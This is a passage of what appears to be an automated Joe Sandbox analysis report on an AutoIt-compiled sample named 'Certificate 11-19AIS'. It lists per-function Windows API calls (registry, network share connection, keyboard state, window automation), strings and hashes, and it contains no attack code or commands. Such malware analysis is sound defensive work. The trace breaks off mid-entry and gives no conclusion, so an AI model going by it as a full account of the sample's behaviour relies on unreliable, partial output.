                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007EA211
                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007EA22D
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007EA249
                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007EA273
                                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 007EA29B
                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007EA2A6
                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007EA2AB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                              • API String ID: 1687751970-22481851
                                                                              • Opcode ID: a960cfdb1417af9b5e8d722665a848a8d7b6dab81496b385bb3c3264dac258df
                                                                              • Instruction ID: 6981b54b9ae0ebf247ce1268019f3d532ea6ae7cbb0727b70c151fc1916a8d4c
                                                                              • Opcode Fuzzy Hash: a960cfdb1417af9b5e8d722665a848a8d7b6dab81496b385bb3c3264dac258df
                                                                              • Instruction Fuzzy Hash: 0D41F776C1162DEACB25EBA4DC99AEDB778FF48710F004469E901B3161EB78AE05CB50
                                                                              Function 00813C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                              • API String ID: 3964851224-909552448
                                                                              • Opcode ID: 1eb943b3ad8f15a0e63f93ce3cf9f861a84fde148237ab00c7180d0b7d965e63
                                                                              • Instruction ID: faa3794fa198169b6b60ba2b8afc4d7e54e05d0872091e58c8d62d5e64197668
                                                                              • Opcode Fuzzy Hash: 1eb943b3ad8f15a0e63f93ce3cf9f861a84fde148237ab00c7180d0b7d965e63
                                                                              • Instruction Fuzzy Hash: 1041427010024ACBDF10EF54E856AEF3369FF52340F515458EC569B292EB74AE9ACB60
                                                                              Function 007F25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,008236F4,00000010,?,Bad directive syntax error,0084DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 007F25D6
                                                                              • LoadStringW.USER32(00000000,?,008236F4,00000010), ref: 007F25DD
                                                                              • _wprintf.LIBCMT ref: 007F2610
                                                                              • __swprintf.LIBCMT ref: 007F2632
                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007F26A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                              • API String ID: 1080873982-4153970271
                                                                              • Opcode ID: 04982c0d16dc25988064edc27ee6ac6a5f6038d7b4e88bead5d925622869fcc9
                                                                              • Instruction ID: 404176ea32f3a51a06fce12ea72f6808b9a685c44a9999c0666c6015e47bb6d0
                                                                              • Opcode Fuzzy Hash: 04982c0d16dc25988064edc27ee6ac6a5f6038d7b4e88bead5d925622869fcc9
                                                                              • Instruction Fuzzy Hash: 63214B3190021EFFCF12AB90CC4AFEE7B39FF18304F044455F515A62A2EA79A629DB51
                                                                              Function 007F7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007F7B42
                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007F7B58
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007F7B69
                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007F7B7B
                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007F7B8C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: SendString
                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                              • API String ID: 890592661-1007645807
                                                                              • Opcode ID: 3c2388d5874b48025c0f719a1b5fa04e9f2edf4f1525fdf0e486e56b8cf0d7b0
                                                                              • Instruction ID: 59d68c1ab6a7cb58efbdd4bbb3b98eae1ce58273340624bb8a5c4ee6576016d4
                                                                              • Opcode Fuzzy Hash: 3c2388d5874b48025c0f719a1b5fa04e9f2edf4f1525fdf0e486e56b8cf0d7b0
                                                                              • Instruction Fuzzy Hash: 7B1182E165025DB9D724B765CC4EEFF7A7CFBD2B10F000429B521A21D1EEA81A45C5A0
                                                                              Function 007F778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • timeGetTime.WINMM ref: 007F7794
                                                                                • Part of subcall function 007CDC38: timeGetTime.WINMM(?,7608B400,008258AB), ref: 007CDC3C
                                                                              • Sleep.KERNEL32(0000000A), ref: 007F77C0
                                                                              • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 007F77E4
                                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 007F7806
                                                                              • SetActiveWindow.USER32 ref: 007F7825
                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007F7833
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 007F7852
                                                                              • Sleep.KERNEL32(000000FA), ref: 007F785D
                                                                              • IsWindow.USER32 ref: 007F7869
                                                                              • EndDialog.USER32(00000000), ref: 007F787A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                              • String ID: BUTTON
                                                                              • API String ID: 1194449130-3405671355
                                                                              • Opcode ID: 8ad1e61746c5224b3073f91402a4489b517b237b30208a5518cab07b0d1f8b87
                                                                              • Instruction ID: 26c988da383c598b94b3f7609cef0e4ac8333fee58b5ed0048a18abcc4c947a7
                                                                              • Opcode Fuzzy Hash: 8ad1e61746c5224b3073f91402a4489b517b237b30208a5518cab07b0d1f8b87
                                                                              • Instruction Fuzzy Hash: 472142B0214309AFE7156B60FC8DB363F6AFB44345F004414F619863B6DB79DD50EA62
                                                                              Function 008002EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              • CoInitialize.OLE32(00000000), ref: 0080034B
                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008003DE
                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 008003F2
                                                                              • CoCreateInstance.OLE32(0083DA8C,00000000,00000001,00863CF8,?), ref: 0080043E
                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008004AD
                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00800505
                                                                              • _memset.LIBCMT ref: 00800542
                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0080057E
                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008005A1
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 008005A8
                                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 008005DF
                                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 008005E1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                              • String ID:
                                                                              • API String ID: 1246142700-0
                                                                              • Opcode ID: 8602c8523116059c7341d24087d55efc72e5d21d1041e82f661a00a6bbd46f29
                                                                              • Instruction ID: 309de8b841d9536582293f5bb6cd5baf134adacb548acd6daa6a8b97114651df
                                                                              • Opcode Fuzzy Hash: 8602c8523116059c7341d24087d55efc72e5d21d1041e82f661a00a6bbd46f29
                                                                              • Instruction Fuzzy Hash: 2CB1C575A00209AFDB14DFA4C889EAEBBB9FF88304F148469E905EB251DB34ED41CF50
                                                                              Function 007F2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?), ref: 007F2ED6
                                                                              • SetKeyboardState.USER32(?), ref: 007F2F41
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 007F2F61
                                                                              • GetKeyState.USER32(000000A0), ref: 007F2F78
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 007F2FA7
                                                                              • GetKeyState.USER32(000000A1), ref: 007F2FB8
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 007F2FE4
                                                                              • GetKeyState.USER32(00000011), ref: 007F2FF2
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 007F301B
                                                                              • GetKeyState.USER32(00000012), ref: 007F3029
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 007F3052
                                                                              • GetKeyState.USER32(0000005B), ref: 007F3060
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: 9177e78f32b2e7b0bd4f298c2d32cc1d8154fcecdb627f1d24fefbb1ad1363fe
                                                                              • Instruction ID: d7f5bee0798d750dac957685b6908e1a5205e55c22740176661622269fb4db9a
                                                                              • Opcode Fuzzy Hash: 9177e78f32b2e7b0bd4f298c2d32cc1d8154fcecdb627f1d24fefbb1ad1363fe
                                                                              • Instruction Fuzzy Hash: 2851C620A0478C69FB35EBA488157FABBF59F11340F08859AD7C2563C3DA5C9B8DC762
                                                                              Function 007EED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000001), ref: 007EED1E
                                                                              • GetWindowRect.USER32(00000000,?), ref: 007EED30
                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007EED8E
                                                                              • GetDlgItem.USER32(?,00000002), ref: 007EED99
                                                                              • GetWindowRect.USER32(00000000,?), ref: 007EEDAB
                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007EEE01
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 007EEE0F
                                                                              • GetWindowRect.USER32(00000000,?), ref: 007EEE20
                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007EEE63
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 007EEE71
                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007EEE8E
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 007EEE9B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                              • String ID:
                                                                              • API String ID: 3096461208-0
                                                                              • Opcode ID: 1357fb42c355c89b468a164d4eeb5dc70621fb7aa29c3d44b976f33a6b925427
                                                                              • Instruction ID: f8fb68e4f59f12f9588ef37bbf1cd7f799bc5da1ac83eba2ca3c0b32fa204c15
                                                                              • Opcode Fuzzy Hash: 1357fb42c355c89b468a164d4eeb5dc70621fb7aa29c3d44b976f33a6b925427
                                                                              • Instruction Fuzzy Hash: FF513FB1B00705AFDF18CF69DD86AAEBBBAFB98700F148529F519D7290E7749D008B50
                                                                              Function 007CB73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007CB759,?,00000000,?,?,?,?,007CB72B,00000000,?), ref: 007CBA58
                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,007CB72B), ref: 007CB7F6
                                                                              • KillTimer.USER32(00000000,?,00000000,?,?,?,?,007CB72B,00000000,?,?,007CB2EF,?,?), ref: 007CB88D
                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0082D8A6
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007CB72B,00000000,?,?,007CB2EF,?,?), ref: 0082D8D7
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007CB72B,00000000,?,?,007CB2EF,?,?), ref: 0082D8EE
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007CB72B,00000000,?,?,007CB2EF,?,?), ref: 0082D90A
                                                                              • DeleteObject.GDI32(00000000), ref: 0082D91C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 641708696-0
                                                                              • Opcode ID: f7742ddbc3234abb8f037440382df0141f70d6c1d04cbb7382ecb16936b1ea6a
                                                                              • Instruction ID: ff8db49d5563120e4b902197a6e47c72d3da5edaab02b7bfd2af7e6ba7027553
                                                                              • Opcode Fuzzy Hash: f7742ddbc3234abb8f037440382df0141f70d6c1d04cbb7382ecb16936b1ea6a
                                                                              • Instruction Fuzzy Hash: 2A613A31501710DFDB259F28E98EB25BBF5FBA4711F14492EF48A86A64C778A8D0DB80
                                                                              Function 007CB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CB526: GetWindowLongW.USER32(?,000000EB), ref: 007CB537
                                                                              • GetSysColor.USER32(0000000F), ref: 007CB438
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ColorLongWindow
                                                                              • String ID:
                                                                              • API String ID: 259745315-0
                                                                              • Opcode ID: 985dff705f9c8a706cc6df1a9016e14a2f6cccceaf55004441dd9a4a05dae8a5
                                                                              • Instruction ID: 7a01d11086726b578aea6eaa599102533aa6ce2902020a284bb25ab445640be2
                                                                              • Opcode Fuzzy Hash: 985dff705f9c8a706cc6df1a9016e14a2f6cccceaf55004441dd9a4a05dae8a5
                                                                              • Instruction Fuzzy Hash: DE41A030004290ABDF245F28E88AFB93B66FB46731F184669FD65CE1E6D7358D81DB21
                                                                              Function 007F690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                              • String ID:
                                                                              • API String ID: 136442275-0
                                                                              • Opcode ID: 18d1490c2171cc1113387559fbbd2605aada32356dd6805c5d440b4a0fdf9bf4
                                                                              • Instruction ID: a79bd14ee20e2a028720b82a4e22c815c8ca3f7ca5edfcac67ae8a06a33442e3
                                                                              • Opcode Fuzzy Hash: 18d1490c2171cc1113387559fbbd2605aada32356dd6805c5d440b4a0fdf9bf4
                                                                              • Instruction Fuzzy Hash: 80412E7684511CAECF61DB90CC46DDA73BDEB44300F0041E7F659A2251EB75ABE58FA0
                                                                              Function 007FD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(0084DC00,0084DC00,0084DC00), ref: 007FD7CE
                                                                              • GetDriveTypeW.KERNEL32(?,00863A70,00000061), ref: 007FD898
                                                                              • _wcscpy.LIBCMT ref: 007FD8C2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                              • API String ID: 2820617543-1000479233
                                                                              • Opcode ID: 3467ec29c8ff273a3917317d17631e606fbc53c61385916647b6266cef5629fd
                                                                              • Instruction ID: f7daf5ad9a4a3db9f71307e3e83c4ac938a002763432cb5339f56bcec9efaf98
                                                                              • Opcode Fuzzy Hash: 3467ec29c8ff273a3917317d17631e606fbc53c61385916647b6266cef5629fd
                                                                              • Instruction Fuzzy Hash: E2518031104308EFC720EF54D886BAEB7A6FF84354F10892DF69997292DB79ED05CA52
                                                                              Function 007B936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __swprintf.LIBCMT ref: 007B93AB
                                                                              • __itow.LIBCMT ref: 007B93DF
                                                                                • Part of subcall function 007D1557: _xtow@16.LIBCMT ref: 007D1578
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __itow__swprintf_xtow@16
                                                                              • String ID: %.15g$0x%p$False$True
                                                                              • API String ID: 1502193981-2263619337
                                                                              • Opcode ID: c1383ec0518162710641db04d7a14f740d7bc962cee899d2240ba91afff78180
                                                                              • Instruction ID: ca307e3b014efeb4b41ef3e407ebb1de2dae2941f35b1b07e7d3edd219aba634
                                                                              • Opcode Fuzzy Hash: c1383ec0518162710641db04d7a14f740d7bc962cee899d2240ba91afff78180
                                                                              • Instruction Fuzzy Hash: 0D41D671504214EBDB24DB78E945FAAB3F4FF44300F20446EF65AD7281EA399941CB60
                                                                              Function 0081A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0081A259
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0081A260
                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0081A273
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0081A27B
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0081A286
                                                                              • DeleteDC.GDI32(00000000), ref: 0081A28F
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0081A299
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0081A2AD
                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0081A2B9
                                                                              Strings
                                                                              Memory Dump Source
